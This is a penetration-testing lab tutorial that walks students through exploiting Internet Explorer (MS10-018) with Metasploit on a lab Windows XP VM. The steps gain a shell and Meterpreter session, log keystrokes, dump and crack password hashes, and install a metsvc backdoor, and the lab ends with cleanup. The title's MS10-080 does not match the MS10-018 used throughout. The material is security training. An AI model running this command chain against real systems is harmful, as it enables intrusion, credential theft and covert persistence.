ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploit >> Current Page |Views: 36894

(Metasploit: MS10-080)

{ BackTrack5R1: Create Malicious Link, Get Password, Set Backdoor  }


Section 0. Background Information
  1. http://technet.microsoft.com/en-us/security/bulletin/MS10-018
    • This vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

  2. References
  3. Lab Notes
    • In this lab we will do the following:
      1. Use Metasploit to create a malicious link using the MS10-018 vulnerability.
      2. We will show how to take over Damn Vulnerable WXP-SP2 once the malicious link is clicked.

  4. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Log into Damn Vulnerable WXP-SP2
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine

     

  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.

     

  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt

     

  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.
    • .

     

  7. Set Simple Administrative Password
    • Instructions:
      1. net user Administrator football

 

Section 2: Log into BackTrack5
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
    •  

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
    •  

     

  3. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
    •  

     

  4. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
    •  

     

  5. Bring up the GNOME
    • Instructions:
      1. Type startx
    •  
Section 4: Bring up a console terminal
  1. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
    •  

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.111.
      • In your case, it will probably be different.

 

Section 5: Starting up the Metasploit MSF Console
  1. Start Up the Metasploit msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.

     

  2. Search for MS10-018
    • Instructions:
      1. search ms10_018
      2. use exploit/windows/browser/ms10_018_ie_behaviors

     

  3. Set Payload
    • Instructions:
      1. set PAYLOAD windows/shell/bind_tcp
      2. show options

     

  4. Set Required Variables
    • Instructions:
      1. set SRVHOST 192.168.1.111
        • Replace 192.168.1.111 which your BackTrack's IP Address obtain from (Section 4, Step 2).
      2. set URIPATH ms10_018.html
        • It is not necessary to set the URIPATH.  It is not necessary to use the name ms10_018_exploit.html.
      3. show options

     

  5. Start Exploit Server
    • Instructions:
      1. exploit
      2. Copy the Weblink (See Picture)
    • Note(FYI):
      • The aurora exploit is all set up.
      • The server is started and the daemon is listening.

 

Section 6: Exploiting Internet Explorer 6
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer

     

  2. Test Phishing Exploit
    • Instructions:
      1. Place the weblink you copied from (Section 5, Step 7) into the Address Bar.
        • E.g., http://192.168.1.111:8080/ms10_018.html
    • Notes(FYI):
      • Replace 192.168.1.111 which your BackTrack's IP Address obtain from (Section 4, Step 2).

 

Section 7: Exploiting Internet Explorer 6
  1. Buffer Overflow Sent
    • Instructions:
      1. Press <Enter>
    • Note(FYI):
      • You can see that the MS10-018 exploit was sent to Damn Vulnerable WXP-SP2.

     

  2. View Sessions
    • Instructions:
      1. sessions -l
        • "l" as in larry.
    • Note(FYI):
      • The command "sessions" will show all the active connections between the attacker, BackTrack (192.168.1.111) and the victim, Damn Vulnerable WXP-SP2 (192.168.1.116)

     

  3. Create New Meterpreter Session
    • Instructions:
      1. setg LHOST 192.168.1.111
        • Allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell.
        • Replace 192.168.1.111 which your BackTrack's IP Address obtain from (Section 4, Step 2)
      2. sessions -u 1
        • "1" as in the number 1.
    • Note(FYI):
      • The interpreter will start staging. After "Command Stager progress" reaches 100% done, hit the key once to get back to the prompt.

     

  4. Interact with the Meterpreter Session
    • Instructions:
      1. Press <Enter> to get a prompt
      2. sessions -l
        • "l" as in larry.
        • Notice there are now two sessions: (1) Shell and (2) Meterpreter.
      3. sessions -i 2
        • "-i" means to interact

 

Section 8: View Processes
  1. View Processes
    • Instructions:
      1. ps

 

Section 9: View Tools/Possibilities
  1. View Tools/Possibilities
    • Instructions:
      1. run<Press Spacebar><Press Tab><Press Tab>
        • <space> means hit the space bar once.
        • <tab> means hit the tab key, which needs to occur twice.
      2. y
      3. Keep Pressing the Spacebar until all the choices are listed.

 

Section 10: run keylogrecorder
  1. View Tools/Possibilities
    • Instructions:
      1. run keylogrecorder
    • Note(FYI):
      • Notice the message that says the keystrokes are being saved to a file.
      • Record your file.

     

  2. Start Up Notepad (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Start --> All Programs --> Accessories --> Notepad

     

  3. Test the key logger recorder
    • Instructions:
      1. In notepad, type whatever you want.
      2. Continue to next step

     

  4. Test the key logger recorder (On BackTrack5R1)
    • Instructions:
      1. Copy Key Log Recorder File (See Picture)
      2. Press <Ctrl> and c to stop the keylogrecorder

     

  5. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon

     

  6. View Key Log Recorder
    • Note(FYI):
      • Replace the below highlighted file with your's obtained from (Section 10, Step 4).
    • Instructions:
      1. cat /root/.msf4/logs/scripts/keylogrecorder/192.168.1.116_20130415.5300.txt

 

Section 11: run scraper
  1. Run Scraper
    • Note(FYI):
      • Don't be alarmed if you see an error after you see the password hashes were dumped.
      • Note, this could take up to 5 minutes to run.
    • Instructions:
      1. run scraper

     

  2. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon

     

  3. View Hash File
    • Instructions:
      1. find /root/.msf4/logs/scripts/scraper/* -print
        • This will show you a list of files that were scraped from Damn Vulnerable WXP-SP2.
      2. cat /root/.msf4/logs/scripts/scraper/*/*hash*
        • This contains all the password hashes on Damn Vulnerable WXP-SP2.
      3. grep -h Admin /root/.msf4/logs/scripts/scraper/*/*hash* > /var/tmp/admin_hash.txt
        • Extract the Administrator password hash
      4. ls -l /var/tmp/admin_hash.txt

     

  4. Crack Password with John the Ripper
    • Instructions:
      1. cat /dev/null > /pentest/passwords/john/john.pot
      2. /pentest/passwords/john/john /var/tmp/admin_hash.txt

 

Section 11: Install Backdoor (metsvc)
  1. Get Metasploit Process ID
    • Instructions:
      1. getsystem
        • The "getsystem" command is used to gain system privileges.
      2. run metsvc
        • The "run metsvc" command installs a backdoor service on the Victim Machine.
      3. Record the temporary installation directory (See Picture)
        • In my case, it is kyKvcFtW

     

  2. View metsvc.exe process
    • Instructions:
      1. ps
        • Hunt for the metsrv.exe process to make sure it is running.

     

  3. Exit From Metasploit
    • Instructions:
      1. exit
        • Shutdown Meterpreter
      2. exit -y
        • Stop Server

     

  4. Start Metasploit Console
    • Instructions:
      1. msfconsole

     

  5. Connect to Backdoor(metsvc.exe)
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/metsvc_bind_tcp
      3. set LPORT 31337
      4. set RHOST 192.168.1.116
        • Replace 192.168.1.116 with Damn Vulnerable WXP-SP2's IP Address obtain from (Section 1, Step 6).
      5. exploit

 

Section 12: Upload Fake Virus
  1. Start Another Terminal
    • Instructions:
      1. Click on the Terminal Icon

     

  2. Create Pretend Virus File
    • Instructions:
      1. cd /var/tmp
      2. touch pretend_virus.txt

     

  3. Upload Fake Virus
    • Instructions:
      1. upload /var/tmp/pretend_virus.txt C:\

 

Section 13: Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. cd ../../
      2. dir | findstr virus
      3. netstat -nao | findstr 31337
      4. date /t
      5. echo "Your Name"
        • This should be your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle

 

Section 13: Clean Up Victim Machine
  1. Exit Metasploit (On BackTrack5R1)
    • Instructions:
      1. exit
      2. exit -y

     

  2. Change the Administrator Password (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. net user Administrator NewPassword
        • Replace the string "NewPassword" with your previous password.

     

  3. End Metsvc Processes
    • Instructions:
      1. tasklist 2>NULL | findstr "metsvc*"
      2. taskkill /F /PID 3328
        • Replace 3328 with the PID associated with metsvc.exe
      3. taskkill /F /PID 440
        • Replace 440 with the PID associated with metsrv-server.exe
      4. tasklist | findstr "metsvc*"

     

  4. Delete Metsvc Backdoor
    • Instructions:
      1. In Windows Explorer navigate to the following directory:
        • C:\Documents and Settings\Administrator\Local Settings\Temp in Windows Explorer
      2. Left Click on the metsvc directory name obtained from (Section 11, Step 1, Instruction 3).
      3. Click Delete
      4. Click the Yes Button to Confirm Folder Delete Message

 



Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth